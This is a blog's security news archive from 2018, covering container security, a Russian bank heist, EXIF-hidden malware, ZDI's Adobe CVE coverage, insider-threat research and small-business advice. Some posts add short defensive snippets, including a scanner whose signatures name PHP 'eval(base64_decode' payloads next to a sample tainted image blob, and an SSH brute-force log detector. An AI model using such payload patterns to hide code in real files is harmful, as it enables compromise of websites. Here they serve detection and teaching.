Category Archives: security

Containers or Virtual Machines: Which is More Secure?

Are virtual machines (VMs) more secure than containers? You may think you know the answer, but IBM Research has found containers can be as secure, or more secure, than VMs. From a report: James Bottomley, an IBM Research Distinguished Engineer and top Linux kernel developer, writes: "One of the biggest problems with the current debate about Container vs Hypervisor security is that no-one has actually developed a way of measuring security, so the debate is all in qualitative terms (hypervisors 'feel' more secure than containers because of the interface breadth) but no-one actually has done a quantitative comparison." To meet this need, Bottomley created the Horizontal Attack Profile (HAP), designed to describe system security in a way that can be objectively measured. Bottomley has discovered that "a Docker container with a well crafted seccomp profile (which blocks unexpected system calls) provides roughly equivalent security to a hypervisor."
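For readers unfamiliar with the mechanism Bottomley refers to: a Docker seccomp profile is a JSON allow-list of system calls, and anything not listed is refused. A minimal sketch follows; the syscall list here is purely illustrative and far too small for a real workload:

```json
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64"],
  "syscalls": [
    {
      "names": ["read", "write", "close", "fstat", "mmap", "brk",
                "futex", "openat", "exit_group"],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
```

A profile of this shape is applied with `docker run --security-opt seccomp=profile.json`; Docker's default profile has the same structure but allows several hundred syscalls, which is why a "well crafted" narrower profile shrinks the attack surface.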

Read more of this story at Slashdot.

Hackers attack Russian bank to steal $1m using an outdated router

By Waqas

Cybercriminals belonging to a notorious hacking group attacked Russia's PIR Bank and stole $1m. The attackers infiltrated the bank's systems by compromising an old, outdated router installed at one of the bank's regional branches. The money was stolen via the Automated Workstation Client (AWC) […]

This is a post from HackRead.com Read the original post: Hackers attack Russian bank to steal $1m using an outdated router

GoogleUserContent CDN Hosting Images Infected with Malware

By Waqas

The malware targets trusted Google sites. Hackers have embedded malicious code in the metadata fields of images uploaded to Google's trusted content delivery network (CDN) in order to compromise websites. This approach is especially damaging because users rarely scan images for malware. The injected malware uses Exchangeable Image File (EXIF) metadata to hide the […]
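EXIF fields are just bytes, so they can carry code fragments (typically PHP snippets such as `eval(base64_decode(...))`) that a vulnerable server later executes. A deliberately naive Python sketch of signature scanning is below; the signature list and the fabricated image blob are illustrative inventions, not real detection rules:

```python
import re

# Illustrative signatures for PHP payloads hidden in EXIF fields;
# real scanners use far richer rule sets than this.
SIGNATURES = {
    "eval": re.compile(rb"eval\s*\("),
    "base64_decode": re.compile(rb"base64_decode\s*\("),
}

def scan_image_bytes(data: bytes) -> list:
    """Return names of signatures found anywhere in the raw image bytes."""
    return sorted(name for name, pat in SIGNATURES.items() if pat.search(data))

# Fabricated JPEG-like blobs; the second has a payload lodged in its metadata area.
clean = b"\xff\xd8\xff\xe1UserComment\x00just a holiday photo\xff\xd9"
tainted = b"\xff\xd8\xff\xe1UserComment\x00eval(base64_decode('aGk='));\xff\xd9"

print(scan_image_bytes(clean))    # → []
print(scan_image_bytes(tainted))  # → ['base64_decode', 'eval']
```

The point of the sketch is simply that metadata travels with the image and is ignored by most content checks, which is exactly what makes a trusted CDN an attractive hiding place.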

This is a post from HackRead.com Read the original post: GoogleUserContent CDN Hosting Images Infected with Malware

Zero-Day Coverage Update – Week of July 16, 2018

One night this week, I came across one of my favorite movies Willy Wonka and the Chocolate Factory. The world had gone crazy after the reclusive Willy Wonka announces that he has hidden five golden tickets in chocolate Wonka Bars that promised a factory tour and a lifetime supply of chocolate. There’s a scene at a school where a teacher, Mr. Turkentine, decides to teach the kids about percentages and uses the Wonka Bars as an example. He asks one student how many Wonka Bars she bought and she replied, “About a hundred.” Mr. Turkentine tells her that there are ten hundreds in a thousand so that’s 10 percent. He asks a couple of other students and the percentages are easy to figure out. Then he asks Charlie Bucket, a poor paperboy, how many Wonka Bars he bought, and he says “Two.” Mr. Turkentine replied, “Two? What do you mean you only opened two? I can’t figure out the percentage for just two, so let’s just pretend you opened two hundred.”

While Mr. Turkentine has trouble with percentages, the Zero Day Initiative (ZDI) doesn’t. This month, Adobe had a bigger than normal patch for their Acrobat product, covering 107 CVEs. 68 of those CVEs came through the ZDI program! I don’t have any trouble figuring out that percentage – that’s 63.6% of the Acrobat vulnerabilities that came through ZDI. The “golden ticket” for Trend Micro customers isn’t a lifetime of chocolate, but preemptive protection against these bugs!
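Unlike Mr. Turkentine, we can verify that percentage with two lines of arithmetic:

```python
# Share of the July 2018 Acrobat CVEs that came through the ZDI program.
zdi_cves, total_cves = 68, 107
share = round(zdi_cves / total_cves * 100, 1)
print(f"{share}%")  # → 63.6%
```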

MindshaRE: An Introduction to PyKD

Earlier this week, ZDI researcher Abdul-Aziz Hariri posted a blog covering the use of PyKD to help automate debugging tasks and crash dump analysis with Python. His post is part of the MindshaRE blog series that offers insight into various reversing techniques for security researchers and reverse engineers. The blog demonstrates the installation and basic configuration of PyKD and goes on to show how it can be used to execute Python scripts from inside WinDbg. You can read the full blog here.

Adobe Security Update

This week’s Digital Vaccine (DV) package includes coverage for Adobe updates released on or before July 10, 2018. The following table maps Digital Vaccine filters to the Adobe updates. You can get more detailed information on this month’s security updates from Dustin Childs’ July 2018 Security Update Review from the Zero Day Initiative:

Bulletin # CVE # Digital Vaccine Filter Status
APSB18-21 CVE-2018-5009 32561
APSB18-21 CVE-2018-5010 32562
APSB18-21 CVE-2018-5011 32563
APSB18-21 CVE-2018-5012 32564
APSB18-21 CVE-2018-12799 32670
APSB18-21 CVE-2018-12803 32565
APSB18-21 CVE-2018-5014 32566
APSB18-21 CVE-2018-5015 32567
APSB18-21 CVE-2018-5016 32568
APSB18-21 CVE-2018-5017 32569
APSB18-21 CVE-2018-5018 32570
APSB18-21 CVE-2018-5019 32571
APSB18-21 CVE-2018-5020 32573
APSB18-21 CVE-2018-5021 32574
APSB18-21 CVE-2018-5022 32575
APSB18-21 CVE-2018-5023 32576
APSB18-21 CVE-2018-5024 32577
APSB18-21 CVE-2018-5025 32578
APSB18-21 CVE-2018-5026 32579
APSB18-21 CVE-2018-5027 32580
APSB18-21 CVE-2018-5028 32581
APSB18-21 CVE-2018-5029 32582
APSB18-21 CVE-2018-5030 32583
APSB18-21 CVE-2018-5031 32584
APSB18-21 CVE-2018-5032 32585
APSB18-21 CVE-2018-5033 32586
APSB18-21 CVE-2018-5034 32587
APSB18-21 CVE-2018-5035 32588
APSB18-21 CVE-2018-5036 32589
APSB18-21 CVE-2018-5037 32590
APSB18-21 CVE-2018-5038 32591
APSB18-21 CVE-2018-5039 32592
APSB18-21 CVE-2018-5040 32593
APSB18-21 CVE-2018-5041 32594
APSB18-21 CVE-2018-5042 32595
APSB18-21 CVE-2018-5043 32596
APSB18-21 CVE-2018-5044 32597
APSB18-21 CVE-2018-5045 32598
APSB18-21 CVE-2018-5046 32599
APSB18-21 CVE-2018-5047 32600
APSB18-21 CVE-2018-5048 32601
APSB18-21 CVE-2018-5049 32602
APSB18-21 CVE-2018-5050 32603
APSB18-21 CVE-2018-5051 32604
APSB18-21 CVE-2018-5052 32605
APSB18-21 CVE-2018-5053 32606
APSB18-21 CVE-2018-5054 32607
APSB18-21 CVE-2018-5055 32608
APSB18-21 CVE-2018-5056 32609
APSB18-21 CVE-2018-5057 32610
APSB18-21 CVE-2018-5058 32611
APSB18-21 CVE-2018-5059 32612
APSB18-21 CVE-2018-5060 32613
APSB18-21 CVE-2018-5061 32614
APSB18-21 CVE-2018-5062 32615
APSB18-21 CVE-2018-5063 32616
APSB18-21 CVE-2018-5064 32617
APSB18-21 CVE-2018-5065 32618
APSB18-21 CVE-2018-5066 32619
APSB18-21 CVE-2018-5067 32620
APSB18-21 CVE-2018-5068 32621
APSB18-21 CVE-2018-5069 32622
APSB18-21 CVE-2018-5070 32623
APSB18-21 CVE-2018-12754 32624
APSB18-21 CVE-2018-12755 32625
APSB18-21 CVE-2018-12756 32626
APSB18-21 CVE-2018-12757 32627
APSB18-21 CVE-2018-12758 32628
APSB18-21 CVE-2018-12760 32629
APSB18-21 CVE-2018-12761 32630
APSB18-21 CVE-2018-12762 32631
APSB18-21 CVE-2018-12763 32632
APSB18-21 CVE-2018-12764 32633
APSB18-21 CVE-2018-12765 32634
APSB18-21 CVE-2018-12766 32635
APSB18-21 CVE-2018-12767 32636
APSB18-21 CVE-2018-12768 32637
APSB18-21 CVE-2018-12770 32638
APSB18-21 CVE-2018-12771 32639
APSB18-21 CVE-2018-12772 32640
APSB18-21 CVE-2018-12773 32641
APSB18-21 CVE-2018-12774 32642
APSB18-21 CVE-2018-12776 32643
APSB18-21 CVE-2018-12777 32644
APSB18-21 CVE-2018-12779 32645
APSB18-21 CVE-2018-12780 32646
APSB18-21 CVE-2018-12781 32647
APSB18-21 CVE-2018-12782 32648
APSB18-21 CVE-2018-12783 32649
APSB18-21 CVE-2018-12784 Vendor Deemed Reproducibility or Exploitation Unlikely
APSB18-21 CVE-2018-12785 32650
APSB18-21 CVE-2018-12786 32651
APSB18-21 CVE-2018-12787 32652
APSB18-21 CVE-2018-12788 32653
APSB18-21 CVE-2018-12789 32654
APSB18-21 CVE-2018-12790 32655
APSB18-21 CVE-2018-12791 32656
APSB18-21 CVE-2018-12792 32657
APSB18-21 CVE-2018-12802 Vendor Deemed Reproducibility or Exploitation Unlikely
APSB18-21 CVE-2018-12793 32658
APSB18-21 CVE-2018-12794 32659
APSB18-21 CVE-2018-12795 32660
APSB18-21 CVE-2018-12796 32661
APSB18-21 CVE-2018-12797 32662
APSB18-21 CVE-2018-12798 32663
APSB18-24 CVE-2018-5007 32559
APSB18-24 CVE-2018-5008 32560


Zero-Day Filters

There are no new zero-day filters in this week’s Digital Vaccine (DV) package. A number of existing filters in this week’s DV package were modified to update filter descriptions, update specific filter deployment recommendations, increase filter accuracy and/or optimize performance. You can browse the list of published advisories and upcoming advisories on the Zero Day Initiative website. You can also follow the Zero Day Initiative on Twitter @thezdi and on their blog.

Missed Last Week’s News?

Catch up on last week’s news in my weekly recap.


What Defines a Cyber Insurgency?

“A fool pulls the leaves. A brute chops the trunk. A sage digs the roots.” – Pierce Brown


The western world is currently grappling with a cyber insurgency. The widespread adoption of the “kill chain” coupled with the use of memory-resident malware has fueled the cyber-attack wildfire. The security architectures mandated by regulators and standards bodies are collapsing. History does repeat itself. One should study the evolution of insurgencies to better grasp the nature of cybersecurity in 2018.


In the Red Rising trilogy, Pierce Brown introduces a military tactic that could only work in a world where humans live on multiple planets and asteroids. We won’t spoil the book completely (go read the series, it’s awesome), but for the purposes of this blog an Iron Rain can be defined as a mass invasion tactic: enemy fleets gather outside the atmosphere of a planet and use pods or other drop ships to launch an overwhelming military force on the planet’s populace.


It’s overwhelming and it’s instant, and if you react badly you are doomed to fall to the Iron Rain. Just like with cyberattacks. It must be stated that attacks do not stand alone; in many cases they are simply part of a larger “Iron Rain” effort. If you follow the strategy behind most nation-state attacks, you quickly start to realise that these efforts resemble insurgency tactics more than they do standard military ones.


What defines a cyber insurgency?


The Department of Defense Joint Publication 1-02, Department of Defense Dictionary of Military and Associated Terms (Washington, DC: U.S. Government Printing Office [GPO], 12 April 2001), defines an insurgency as “an organised movement aimed at the overthrow of a constituted government through the use of subversion and armed conflict.”


In cyber terms, this becomes “an organised movement aimed at the disruption of cyber systems through subversion and armed cyber conflict.”


The goals of a cyber insurgency may vary; however, the following conditions must exist:


  1. You must have a common entity or authority against whom your actions are directed.
  2. You must have the tools of cyber insurrection and the systems to launch attacks against that entity.
  3. The cyber insurgents must be willing to use cyber force against their targets. This element distinguishes a cyber insurrection from pure intelligence gathering.


As a former U.S. Marine, I was taught to think differently. We were taught to think like the enemy and take the fight to them when needed. The Marines have a history of doing more with far less, and we take pride in it. Just like InfoSec teams. Over the last few years it has become apparent that our enemies are emboldened and becoming more aggressive. We must shift our thinking and tactics to begin to turn the tide, just as every battlefield Marine learns: intel changes, things move fast, and people’s lives are at risk.


It is fundamental that cybersecurity professionals take a page from the annals of irregular or low-intensity warfare to better understand how to combat this threat. This article is meant to begin an open discussion on how we as defenders can best modernise our cybersecurity strategies. Many of the strategic tenets below are derived from the Marine Corps counterinsurgency manual, FM 3-24/MCWP 3-33.5, and adapted to the world of cyber.


To discuss cyber insurgencies effectively, we must first discuss the idea of irregular warfare.


Low intensity warfare or irregular warfare is a violent struggle among state and non-state actors for legitimacy and influence over the relevant populations. Irregular warfare favours indirect approaches, though it may employ the full range of evasion and other capacities in order to erode an adversary’s prevention, detection, and response capabilities.


When counterinsurgents attempt to defeat an insurgency, they employ a range of diverse methods. Leaders must effectively arrange these methods in time and cyberspace to accomplish strategic objectives. The various combinations of these methods, with different levels of resourcing, provide each team with a wide range of strategic options to defeat an insurgency.


“Effective cyber counterinsurgency operations require an understanding of not only available cyber security capabilities but also the capabilities of the adversary.”


The tasks counterinsurgents perform in countering an insurgency are not unique; it is the organisation of these tasks in time and space that is unique. For example, financial organisations may employ strategy to align and shape efforts, resources, and tasks to support strategic goals and prepare for specific attacks on their institution. In support of this goal, good strategies would normally emphasise security cooperation activities, building partner capacity and sharing threat intelligence.


Business leaders and security leaders must have a dialogue to decide the optimal strategy to meet the security needs of the organisation the team is supporting. Different capabilities provide different choices that offer different costs and risks.


Unified action is essential for all types of involvement in any counterinsurgency. Unified action is the synchronisation, coordination, and/or integration of the activities of entities with cyber security operations to achieve unity of effort. Your organisation must have a unified approach to cyber operations.


We must begin to think collectively as an organisation. The time for siloed decisions is over. The time for unified action is here, and we must unify our strategies to combat the ongoing cyber insurgency. On 19th July, we will be releasing the Cb Quarterly Incident Response Threat Report (QIRTR), in which we survey dozens of our IR and MDR partners for ground truth in cyber. The results will be of interest to you and your organisation. Stay tuned!

The post What Defines a Cyber Insurgency? appeared first on IT SECURITY GURU.

Amazon Prime Day: 60% increase in cloud transactions impact business apps

Amazon Prime Day took place this week, with the retailer claiming that sales in the first 10 hours grew even faster than in the first 10 hours of the 2017 event, which exceeded £766m ($1bn) globally. According to reports, spending jumped 89 percent in the first 12 hours of the event compared to the same period last year.

Zscaler released its own data, revealing the number of Amazon transactions taking place in the Zscaler cloud from 1am BST on Monday 16th July to the end of the day on Tuesday 17th July. The data revealed there were 60 percent more cloud transactions to Amazon.com on Prime Day than the Zscaler cloud sees on a typical day. You can see the network traffic spikes in the graph attached.

Matt Piercy, vice president and general manager EMEA at Zscaler, commented on the results, noting that as businesses increasingly move their infrastructure to the cloud, these daytime spikes have a reduced impact on business applications:

“Our data indicates that, during Amazon Prime Day, Amazon traffic in the Zscaler cloud rose considerably during the working day, with tens of millions more people visiting Amazon.com than usual over the two days. The growing popularity of retail events like Amazon Prime Day means people are likely going to find ways of shopping while at work, which can have a significant impact on network bandwidth – something that has traditionally posed a problem for the IT team. Indeed, as more businesses adopt BYOD policies, we’re finding a growing number of personal as well as corporate devices connected to the WLAN. Online shopping to this extent can hamper the performance of business critical applications, such as file sharing, backup, and Office 365.

“The truth is, however, that the modern enterprise will incur network spikes, planned or not, that will put a strain on network resources. Whether it’s Amazon Prime Day or another popular sale such as Black Friday/Cyber Monday, unexpected demand for a product, or even an oversubscribed employee webcast, network spikes are no longer an anomaly – they’ll happen. The good news is that we are on the cusp of a new era for business. More and more enterprises are moving their infrastructure to the cloud, which offers a level of elasticity that businesses have not previously experienced. By embracing digital transformation, enterprises no longer need to buy new appliances, install virtual machines or block major retail events like Amazon Prime to accommodate spiked traffic.”

The post Amazon Prime Day: 60% increase in cloud transactions impact business apps appeared first on IT SECURITY GURU.

Vulnerable IoT Vacuums, DVRs Put Homes at Risk

The internet of things (IoT) has seen a string of vulnerabilities across multiple devices, the latest of which are new vulnerabilities in Dongguan Diqee 360 robotic vacuum cleaners, which could allow cybercriminals to eavesdrop, perform video surveillance and steal private data, according to Positive Technologies.

View Full Story

ORIGINAL SOURCE: Infosecurity Magazine

The post Vulnerable IoT Vacuums, DVRs Put Homes at Risk appeared first on IT SECURITY GURU.

Pen testing: why do you need it, and five steps to doing it right

Penetration testing can contribute a lot to an organisation’s security by helping to identify potential weaknesses. But for it to be truly valuable, it needs to happen in the context of the business.

I asked Brian Honan, CEO of BH Consulting, to explain the value of pen testing and when it’s needed. “A pen test is a technical assessment of the vulnerabilities of a server, but it needs the business to tell you which server is most important. Pen testing without context, without proper scoping and without regular re-testing has little value,” he said.

Steps to do pen testing right

Some organisations feel they need to conduct a pen test because they have to comply with regulations such as PCI DSS, to satisfy auditors, or because the board has asked for it. Those are often the worst reasons to start. To do it right, a business should:

  • Dedicate appropriate budget and time to the test
  • Carry out a proper scoping exercise first
  • Set proper engagement parameters
  • Run it regularly – preferably quarterly, not just once a year
  • Use pen testing to check new systems before they go into production.

Absent those key elements, the test will not fail as such, but the approach from the start is just to tick a box. That’s why a one-off test will tell you little about how secure a system is. “A pen test is only a point-in-time assessment of a particular system, and there are ways to game the test. We have done pen tests where a client told us ‘these systems are out of scope’ – but they would be in scope for a criminal,” said Brian.

Prioritising business risks

The reason for running a pen test before systems go into production is that criminals may target them once they are live. It’s especially important if the new system will be critical to the business. “The value of doing a good pen test within the context of the business is that it will identify vulnerabilities and issues that the organisation can prioritise based on business impact,” said Brian.

Pen testing, though valuable, is only one element of good security. “Unfortunately, many people think that if they run a pen test against their website, and it finds nothing, therefore their security is OK,” Brian said. “Just because you have car insurance doesn’t mean you won’t have an accident. There are many other factors that come into play: road conditions, other drivers on the road, confidence and experience of the driver.”

Brian warned against the risk of using pen testing as a replacement for a comprehensive security programme. If organisations have limited budget, spending it on a pen test arguably won’t make them any more secure. “Just doing it once a year to keep an auditor happy is not the best approach. It’s not a replacement for a good security programme,” he said.

The post Pen testing: why do you need it, and five steps to doing it right appeared first on BH Consulting.

Microsoft detected Russian phishing attacks on three 2018 campaigns

Russia is still launching cyberattacks against the US, a Microsoft exec has revealed, contradicting what the President claimed just a few days ago. According to Microsoft VP for customer security and trust Tom Burt (shown above second from right, with his hand raised), his team discovered a spear-phishing campaign targeting three candidates running for office in 2018. Burt announced his team's findings while speaking on a panel at the Aspen Security Forum, where he also revealed that they traced the new campaign to a group believed to be operated by the GRU, Russia's military intelligence agency. In other words, those three candidates are being targeted by the same organization that infiltrated the DNC and Hillary Clinton's presidential campaign in 2016.

Source: Buzzfeed News, Aspen Institute (YouTube)

Chinese Hackers Targeted IoT During Trump-Putin Summit

Zorro shares a report from Defense One: Four days before U.S. and Russian leaders met in Helsinki, hackers from China launched a wave of brute-force attacks on internet-connected devices in Finland, seeking to gain control of gear that could collect audio or visual intelligence, a new report says. Traffic aimed at remote command-and-control features for Finnish internet-connected devices began to spike July 12, according to a July 19 report by Seattle-based cybersecurity company F5. China generally originates the largest chunk of such attacks; in May, Chinese attacks accounted for 29 percent of the total. But as attacks began to spike on July 12, China's share rose to 34 percent, the report said. Attacks jumped 2,800 percent. The China-based hackers' primary target was SSH (Secure Shell) port 22 -- not a physical destination but the numbered network endpoint that tells a server which service should handle an incoming connection. "SSH brute force attacks are commonly used to exploit systems and [internet of things, or IOT] devices online," the report says. "SSH is often used by IoT devices for 'secure' remote administration." The report notes that attack traffic came from the U.S., France, and Italy as well, but the U.S. and French traffic kept with its averages. "Russian attack traffic dropped considerably from third, its usual spot, to fifth," reports Defense One. "German attack traffic jumped."
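SSH brute forcing of the kind F5 describes leaves an obvious trail in authentication logs. Here is a minimal Python sketch of spotting it; the sample lines mimic the common OpenSSH syslog format, and the threshold is an arbitrary example, not a recommended value:

```python
import re
from collections import Counter

# "Failed password" lines in the usual OpenSSH syslog format.
FAILED = re.compile(r"Failed password for .* from (\d{1,3}(?:\.\d{1,3}){3})")

def brute_force_suspects(log_lines, threshold=3):
    """Count failed SSH logins per source IP; return IPs at or above threshold."""
    hits = Counter()
    for line in log_lines:
        m = FAILED.search(line)
        if m:
            hits[m.group(1)] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}

# Fabricated sample log lines for illustration.
sample = [
    "sshd[101]: Failed password for root from 203.0.113.9 port 52110 ssh2",
    "sshd[101]: Failed password for admin from 203.0.113.9 port 52111 ssh2",
    "sshd[101]: Failed password for root from 203.0.113.9 port 52112 ssh2",
    "sshd[102]: Accepted password for alice from 198.51.100.7 port 40022 ssh2",
]
print(brute_force_suspects(sample))  # → {'203.0.113.9': 3}
```

Real deployments use tools such as fail2ban for this, but the underlying idea is the same: repeated failures from one source stand out immediately.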

Read more of this story at Slashdot.

Microsoft Reveals First Known Midterm Campaign Hacking Attempts

An anonymous reader shares a report: Microsoft detected and helped block hacking attempts against three congressional candidates this year, a company executive said Thursday, marking the first known example of cyber interference in the midterm elections. "Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks," said Tom Burt, Microsoft's vice president for security and trust, at the Aspen Security Forum. "And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections." Burt declined to name the targets but said they were "people who, because of their positions, might have been interesting targets from an espionage standpoint as well as an election disruption standpoint." Microsoft took down the fake domain and worked with the federal government to block the phishing messages.

Read more of this story at Slashdot.

Hackers Breach Russian Bank and Steal $1 Million Due To Outdated Router

Catalin Cimpanu, reporting for BleepingComputer: A notorious hacker group known as MoneyTaker has stolen roughly $1 million from a Russian bank after breaching its network via an outdated router. The victim of the hack is PIR Bank, which lost at least $920,000 in money it had stored in a corresponding account at the Bank of Russia. Group-IB, a Russian cyber-security firm that was called in to investigate the incident, says that after studying infected workstations and servers at PIR Bank, they collected "irrefutable digital evidence implicating MoneyTaker in the theft." Group-IB are experts in MoneyTaker tactics because they unmasked the group's existence and operations last December when they published a report on their past attacks.

Read more of this story at Slashdot.

Cyber Security Incidents: Insider Threat falls in UK (to 65%) and Germany (to 75%) post GDPR, but US risk increases (to 80%)

New research by data security company Clearswift has shown that, year on year, cyber security incidents caused by those within the organisation, as a percentage of all incidents, have fallen in the UK and Germany, two countries now subject to GDPR. However, in the United States, a country outside the regulation’s direct jurisdiction, threats are on the rise.


The research surveyed 400 senior IT decision makers in organisations of more than 1,000 employees across the UK, Germany, and the US. The data has revealed that when looking at the true insider threat, which takes into account inadvertent and malicious threats from the extended enterprise – employees, customers, suppliers, and ex-employees – this number sits at 65% in the UK, down from 73% in 2017. Similarly, senior IT decision makers in Germany also saw a drop to 75%, down from 80% the previous year. US respondents actually saw a rise in the insider threat up to 80%, a number rising from 72% in 2017.


Direct threats from an employee within the business – inadvertent or malicious – now make up 38% of incidents. This halts the rising trend evident in 2017 and 2015, which showed 42% and 39% respectively. Threats from ex-employees account for 13% of all cyber security incidents, highlighting a clear need for better processes when employees part ways.


“Although there’s a slight decrease in numbers in the EMEA region, the results once again highlight the insider threat as being the chief source of cyber security incidents. Three quarters of incidents are still coming from within the business and its extended enterprise, far greater than the threat from external hackers. Businesses need to shift the focus inwards”, said Dr Guy Bunker, SVP Products at Clearswift.


“I think at the very least what GDPR has done is ensure firms have a better view of where critical data sits within their business and highlighted to employees that data security is an issue that is now of critical importance, which may be why we’ve seen a drop in the insider threat across EU countries. If a firm understands where the critical information within the business is held and how it is flowing in and out of the network, then it is best placed to manage and protect it from the multitude of threat vectors we’re seeing today.”


Although insiders pose the biggest threat to most organisations, employers believe that the majority (62%) of incidents are accidental or inadvertent rather than deliberate in intent; a number slightly down on 2017 (65%).


The insider threat was slightly lower at companies with over 3,000 employees (36%) than at those with between 1,000 and 3,000 employees. This is a possible indication of more robust internal processes and checkpoints at larger businesses.


Bunker added, “Organisations need to have a process for tracking the flow of information in the business and have a clear view on who is accessing it and when. Businesses need to also ensure that employees ‘buy into’ the idea that data security is now a critical issue for the business. Educating them on the value of data, on different forms of data, what is shareable and what’s not, is crucial to a successful cyber security strategy.


“Having said that, mistakes can still happen and technology can act as both the first and last line of defence. In particular, Adaptive Data Loss Prevention solutions can automatically remove sensitive data and malicious content as it passes through a company network.”
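Pattern-based redaction of the sort Bunker alludes to can be sketched in a few lines. The two regexes below are simplistic stand-ins, not production DLP rules; real engines combine many detectors with context and validation checks:

```python
import re

# Simplistic example patterns for illustration only.
PATTERNS = {
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "CARD": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def redact(text: str) -> str:
    """Replace each detected sensitive value with a labelled placeholder."""
    for label, pattern in PATTERNS.items():
        text = pattern.sub(f"[REDACTED {label}]", text)
    return text

msg = "Contact jane@example.com, card 4111 1111 1111 1111, ok?"
print(redact(msg))  # → Contact [REDACTED EMAIL], card [REDACTED CARD], ok?
```

An adaptive DLP product applies this kind of matching inline, as content passes through mail and web gateways, rather than blocking whole messages outright.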


The post Cyber Security Incidents: Insider Threat falls in UK (to 65%) and Germany (to 75%) post GDPR, but US risk increases (to 80%) appeared first on IT SECURITY GURU.

6 ways you are sabotaging your cyber defences

If we asked any of the IT departments we deal with on a daily basis about their current priorities, they would all unfailingly say that protecting their company against cyber attacks and data breaches is top of the list – particularly now that GDPR is finally in force.


However, despite high awareness of the risks in terms of reputational damage, regulatory penalties and commercial losses, it’s evident that a surprisingly high proportion of companies – from SMEs to global corporations – are burying their heads in the sand when it comes to shoring up their cyber defences.


Here are 6 ways that we see companies failing to minimise their chances of suffering an information breach.


  • Neglecting security until it’s too late

This is a far more common story than you would imagine. The reason? Until they’ve been targeted by cyber criminals, many companies still won’t recognise the very real likelihood – and potentially devastating impact – of a security breach. They think they can get away with not spending money until a crisis occurs.


Firstly, if there were a system to rate the cyber security threat at an individual company level, it would read severe – an attack is highly likely. Nearly half of all businesses in the UK were hit by a cyber attack in the last 12 months, with 38 new ransomware attacks being reported every day. Secondly, as we tell clients – prepare for disaster, recover faster!


  • Thinking you can prevent breaches

In the security world, preparation doesn’t mean prevention. We are all engaged in a constant battle with ever-more sophisticated cyber criminals, and attacks are going to happen. Your security strategy should focus on defence but also on response. Early identification and containment are absolutely vital. Once attackers have infiltrated a laptop or email system, can they then roam freely around your entire network? Think of them like physical intruders, who will try any route. You’ve designed the building, so install fire doors to slow them down!


  • Not defining your business-critical data assets

Many organisations, especially those who have been hit by a breach and are in panic mode, haven’t covered off one of the basics: defining information assets and ranking them by priority in order to conduct a proper risk assessment. In essence, this crucial step is about understanding what you hold, its importance to the business and specific security risks. Only then can you make informed decisions and put the right measures in place.


  • Not testing defences appropriately 

It’s well-recognised that companies should conduct an independent review of their information security posture every 12 months. But we find that a security testing strategy needs to be more flexible than this. A rigid annual review can expose you to vulnerabilities if you’ve installed new software or servers, for instance. Ideally, a pen test should be carried out after any significant change to your IT infrastructure.


  • Over-relying on tech

Security is a process, not a product – and to mitigate the risks associated with social engineering, this is a fundamental lesson to take to heart. Overlooking the human angle will cause even the most advanced technical barriers to crumble. Train your staff, refresh that training, embed it into HR procedures and regular team meetings, put policies and procedures in place – and check that they are followed. Clients often tell us that they have the tightest security policies known to man – yet nobody is monitoring how well staff understand and adhere to them. Remember that the workforce is your frontline defence.

 

  • Resistance to change

Is the IT or senior management team open to challenging existing ways of working, such as by bringing in external security advisors? It’s important to be honest with yourself about the capacity and limitations of your in-house resources. There is no room for being defensive or territorial in IT security – in fact, those attitudes could lead to very serious problems, particularly under the GDPR, which makes data protection everybody’s business. Risk assessments and decision-making need to be objective – and sometimes that’s easier to hear from a third party.

 

Of course, many of these fundamental processes are a requirement for ISO 27001-certified firms, but even then we find that there is often an emphasis on box-ticking and meeting initial standards, which tend to lapse over time. An effective information security framework needs to be continually refreshed and honed – with a security mindset embedded into your company’s culture at every level.

The post 6 ways you are sabotaging your cyber defences appeared first on IT SECURITY GURU.

Will this biz be poutine up the cash? Hackers demand dosh to not leak stolen patient records

Hackers say they will leak patient and employee records stolen from a Canadian healthcare provider unless they are paid off. The records include medical histories and contact information for tens of thousands of home-care patients in Ontario, Canada, and belong to CarePartners. The biz, which provides home medical care services on behalf of the Ontario government, admitted last month that it had been hacked, and its documents copied.

View Full Story

ORIGINAL SOURCE: The Register

The post Will this biz be poutine up the cash? Hackers demand dosh to not leak stolen patient records appeared first on IT SECURITY GURU.

Retail cyber security spending ineffective as breaches rise

Half of US retailers experienced a data breach in the past year, up from 19% the year before, according to the retail edition of the 2018 Thales data threat report. This increase drove US retail to the second most breached sector in the US after the federal government, putting it ahead of healthcare and financial services. The increased number of data breaches in the sector means that three-quarters of US retailers polled have experienced at least one data breach, up from 52% a year ago.

View Full Story

ORIGINAL SOURCE: Computer Weekly

The post Retail cyber security spending ineffective as breaches rise appeared first on IT SECURITY GURU.

UK School Software Bug Assigns Kids to the Wrong Parents

IT firm Capita has come clean about a bug in the software it supplies to UK schools that has been mismatching kids with the wrong families since December 2017. According to a message sent to school administrators this week, the bug affects the Schools Information Management System (SIMS), a type of software used by UK schools to keep track of students, their grades, classes, and parent information.

View Full Story

ORIGINAL SOURCE: Bleeping Computer

The post UK School Software Bug Assigns Kids to the Wrong Parents appeared first on IT SECURITY GURU.

Brit watchdog fines child sex abuse inquiry £200k over mass email blunder

The UK’s data watchdog today issued the Independent Inquiry into Child Sexual Abuse (IICSA) a £200,000 penalty after it sent a bulk email to participants that identified possible victims of historical crimes. The Information Commissioner’s Office (ICO) said IICSA – set up in 2014 to probe the degree to which institutions in England and Wales failed in their duty to protect young people from molestation – had breached the Data Protection Act (DPA) 1998 by not keeping confidential and sensitive personal data secure.

View Full Story

ORIGINAL SOURCE: The Register

The post Brit watchdog fines child sex abuse inquiry £200k over mass email blunder appeared first on IT SECURITY GURU.

A Short Guide to Cyber Security for Small Businesses

Cyber security is an increasingly important topic for any small business to tackle, yet it remains a mystery to many. Unpicking the complexity of this issue might seem daunting, but this brief guide will lay the groundwork. For a fuller picture, check out Fidus Information Security’s ultimate cyber security guide for business.

Main Security Threats to Consider

There are lots of ever-evolving threats posed by cybercriminals to small businesses, but the main ones include phishing, identity theft, DDoS (distributed denial of service) attacks and malware infections.

Phishing comes in several forms, including fake sites designed to trick visitors into entering sensitive data or downloading dangerous code. It can also involve phoney emails and other fraudulent communications with similar aims in mind.

